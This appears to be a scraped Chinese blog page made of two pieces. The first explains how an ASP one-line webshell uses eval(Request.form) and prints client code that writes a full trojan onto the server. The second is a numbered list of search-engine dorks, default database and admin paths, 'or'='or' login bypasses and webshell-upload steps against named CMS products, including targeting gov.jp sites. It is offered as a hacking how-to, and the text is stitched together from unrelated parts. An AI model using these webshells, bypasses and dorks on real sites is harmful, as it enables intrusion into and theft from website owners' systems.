首先<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>是JavaScript脚本的开始标记,其中RUNAT属性的值SERVER表示脚本将在服务器端运行, 后面的eval是一句话木马的精华部分,使用eval方法的话它里面的字符串将会被执行,这样当脚本在服务器端运行的时候同时也执行了 Request.form(‘#’)+”这句代码,Request.form(‘#’)的作用是读取客户端文件中html标记属性中name值被命名 为#的部分,例如如下摘自一句话客户端的代码:
　　<textarea name=# cols=”80″ rows=”10″>
　　set iP=server.createObject(“Adodb.Stream”)
　　iP.Open
　　iP.Type=2
　　iP.CharSet=”gb2312″
　　iP.writetext request(“aoyun”)
　　iP.SaveToFile server.mappath(“aoyunwan.asp”),2
　　iP.Close
　　set iP=nothing
　　response.redirect “aoyunwan.asp”
　　</textarea>
　　学过html的朋友应该注意到了在textarea标记中的name属性被赋值为#,也就是服务器端就是要读取其中的代码(使用Request.form(‘#’)),然后执行(使用eval(Request.form(‘#’)+”)),也就是执行了:
　　set iP=server.createObject(“Adodb.Stream”)
　　iP.Open
　　iP.Type=2
　　iP.CharSet=”gb2312″
　　iP.writetext request(“aoyun”)
　　iP.SaveToFile server.mappath(“aoyunwan.asp”),2
　　iP.Close
　　set iP=nothing
　　response.redirect “aoyunwan.asp”
　　学过asp的朋友应该看的懂,上面代码的意思是首先创建一个流对象ip,然后使用对象中的writetext方法将 request(“aoyun”)读取过来的内容(就是我们常见的一句话客户端的第二个textarea域中的内容,也就是我们的大马的代码)写入服务端 的 aoyunwan.asp
　　文件中,写入结束后使用set iP=nothing 释放对方 然后使用response.redirect “aoyunwan.asp” 转向写入的文件,就是我们最后见的大马了!
　　
关于服务器错误

　　经常,当我们在一个asp文件内添加了一句话后,就会出现类型不匹配的错误:
　　Script error detected at line 1.
　　Source line: execute request(“nettoo”)
　　Description: 类型不匹配: ‘execute’
　　这个如何解决呢?
　　想出了一个好办法,只要用”eval”替换掉”execute”服务端,就不会出错了!

相关日志

• 04/10/2010 -- GOOGLE翻墙代码 (0)
• 06/16/2009 -- nginx.conf – nginx配置文件说明 (1)
• 06/06/2009 -- nginx详解 (0)
• 02/07/2009 -- nginx配置详细说明 (0)
• 10/07/2010 -- Godaddy IIS7 ReWrite 规则的编写 (3)

索:oioj’s blog
　　24
　　动易
　　列目录
　　admin_articlerecyclebin.asp
　　inurl:admin_articlerecyclebin.asp
　　25.
　　工具:网站猎手
　　关键词:inurl:Went.asp
　　后缀:manage/login.asp
　　口令:’or’='or’
　　26.
　　入侵魔兽私服
　　需要的工具：ASP木马一只。
　　Domain3.5明小子
　　关键字：All Right Reserved Design:游戏联盟
　　后台地址：admin/login.asp
　　数据库的地址：chngame/#chngame.mdb
　　27.
　　漏洞是利用管理员iis设置的失误
　　用baidu 关键字就是比较罕见的脚本名
　　动网: ReloadForumCache.asp
　　Leadbbs: makealltopanc.asp
　　BBSXP: admin_fso.asp
　　动易: admin_articlerecyclebin.asp
　　28.
　　国外站的爆库漏洞
　　关键字：sad Raven’s Guestbook
　　密码地址:/passwd.dat
　　后台地址:/admin.php
　　29.
　　Discuz 4.1.0跨站漏洞
　　利用工具:1,WAP浏览器
　　2,WAP编码转换器
　　关键字:”intext:Discuz! 4.1.0″
　　30.
　　关键字：尚奈克斯
　　后台路径/system/manage.asp
　　直接传ASP木马
　　31.
　　工具
　　1:网站猎手
　　2:大马一个
　　关键字:切勿关闭Cookies功能，否则您将不能登录
　　插入diy.asp
　　32.
　　关键字:Team5 Studio All rights reserved
　　默认数据库:data/team.mdb
　　33.
　　工具: 挖掘机 辅臣数据库读取器
　　关键字: 企业简介 产品展示 产品列表
　　后缀添加: /database/myszw.mdb
　　后台地址: admin/Login.asp
　　34.
　　关键子 XXX inurl:Nclass.asp
　　在”系统设置”里写个木马。
　　会被保存到 在 config.asp内。
　　35.
　　不进后台照样拿动网WEBSHELL
　　data.asp?action=BackupData 动网数据库备份默认路径
　　36.
　　工具:网站猎手 WebShell
　　关键字:inurl:Went.asp
　　后缀:manage/login.asp
　　弱口令:’or’='or’
　　37.
　　关键字:Powered by:QCDN_NEWS
　　随便扫遍文章加一个’ ,来试探注入点
　　后台地址:admin_index.asp
　　38.
　　入侵雷池新闻发布系统
　　关键字:leichinews
　　去掉leichinews后面的.
　　打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp
　　再上传马…..
　　进访问uppic anran.asp 登陆马.
　　39.
　　关键字:Power System Of Article Management Ver 3.0 Build 20030628
　　默认数据库:database\yiuwekdsodksldfslwifds.mdb
　　后台地址:自己扫描!
　　40.
　　一、通过GOOGLE搜索找大量注入点
　　关键字：asp?id=1 gov.jp/ asp?id=
　　页数：100
　　语言：想入侵哪个国家就填什么语言吧
　　41.
　　关键字：Powered by:94KKBBS 2005
　　利用密码找回功能 找回admin
　　提问:ddddd 回答:ddddd
　　42.
　　关键字:inurl:Went.asp
　　后台为manage/login.asp
　　后台密码: ‘or’=’ 或者 ‘or=or’ 登录　进入
　　默认数据库地址:Database/DataShop.mdb
　　43.
　　关键字:****** inurl:readnews.asp
　　把最后一个/改成%5c ,直接暴库,看密码,进后台
　　随便添加个新闻 在标题输入我们的一句话木马
　　44.
　　工具:一句话木马
　　BBsXp 5.0 sp1 管理员猜解器
　　关键词:powered by bbsxp5.00
　　进后台,备份一句话马!
　　45.
　　关键字：程序核心：BJXSHOP网上开店专家
　　后台:/admin

相关日志

• 03/22/2010 -- 什么是WHM？ (1)
• 06/02/2009 -- linux psaadm 用户——什么是Plesk (0)
• 09/30/2010 -- Zen Cart整合WordPress之Wordpress on ZenCart安装 (0)
• 03/19/2010 -- lightinthebox的robots.txt (0)
• 12/01/2009 -- Google注册域名大全 (0)